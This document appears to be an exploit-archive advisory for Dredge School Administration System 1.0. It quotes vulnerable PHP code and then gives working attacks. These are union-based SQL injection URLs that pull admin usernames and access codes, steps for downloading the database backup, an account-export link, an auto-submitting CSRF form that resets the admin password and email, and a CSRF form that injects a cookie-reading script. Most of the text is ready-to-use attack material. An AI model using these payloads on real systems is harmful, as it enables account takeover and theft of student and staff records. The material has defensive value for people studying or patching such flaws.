Dredge School Administration System 1.0 Multiple Vulnerabilities

2014-01-09T00:00:00
ID 1337DAY-ID-21739
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2014-01-09T00:00:00

Description

Dredge School Administration System version 1.0 suffers from backup disclosure, account disclosure, cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities.

                                        
                                            Dredge School Administration System V1.0   - Multiple Vulnerabilties
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [[email protected]] , [[email protected]]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://sourceforge.net/projects/studentrecord/
####################################################################

I. Sql Injection

######################################
VULNERABILITY: CLASSIC MYSQL INJECTION
######################################

/loader.php (LINE: 10-17)

-----------------------------------------------------------------------------
  $searchwords = $_GET['load'];
 $searchwords = stripslashes($searchwords);
 $searchwords = strip_tags($searchwords);
 $searchwords = trim($searchwords, "'");
 $load = $_GET['load'];
 mysql_select_db($database_drsa, $drsa);
 $query_file = "SELECT * FROM system WHERE system_name = '$searchwords'";
 $file = mysql_query($query_file, $drsa);

-----------------------------------------------------------------------------

#####################################################
EXPLOIT
#####################################################

http://localhost/DSM/loader.php?load=editsession&Id=null+and+1=2+union+select+username,2,3,4,AccessCode,6+from+adminstaff

http://localhost/DSM/loader.php?load=editterm&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4+from+adminstaff

http://localhost/DSM/loader.php?load=editclass&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4,5,6+from+adminstaff

ETC.......



II. Backup Download

##############
VULNERABILITY
##############

/Backup/processbackup.php (LINE: 89-93)

-----------------------------------------------------------------------------
    //save file
 // $handle =
fopen('db-backup-'.time().'-'.(md5(implode(',',$tables))).'.sql','w+');
  $handle = fopen('RecordManager.sql','w+');
  fwrite($handle,$return);
  fclose($handle);

-----------------------------------------------------------------------------

#####################################################
EXPLOIT
#####################################################

1. Open http://localhost/DSM/Backup/processbackup.php
2. When you open the link produces RecordManager.sql
3. to download backup [http://localhost/DSM/Backup/RecordManager.sql]



III. Accounts Disclosure

<html>
<title>Iphobos Blog</title>
<label><a href="http://localhost/DSM/loader.php?load=data export
send&tableid=3" class="button white">Export Accounts</a></label>
</html>


IV. Cross Site Request Forgery

[Change Password & Email Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://localhost/DSM/loader.php?load=account settings">
<input type="hidden" name="AccessCode" value="123456" />
<input type="hidden" name="ConfirmAccessCode" value="123456" />
<input type="hidden" name="Email" value="[email protected]" />
<input type="hidden" name="MM_update" value="form2" />
</form>
</body>
</html>


V. Cross Site Scripting

[CSRF with XSS Exploit]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://localhost/DSM/loader.php?load=new subject">
<input type="hidden" name="Code"
value="<script>alert(document.cookie);</script>" />
<input type="hidden" name="Description" value="Iphobos Blog" />
<input type="hidden" name="MM_insert" value="form1" />
</form>
</body>
</html>


####################################################################
####################################################################

#  0day.today [2018-01-05]  #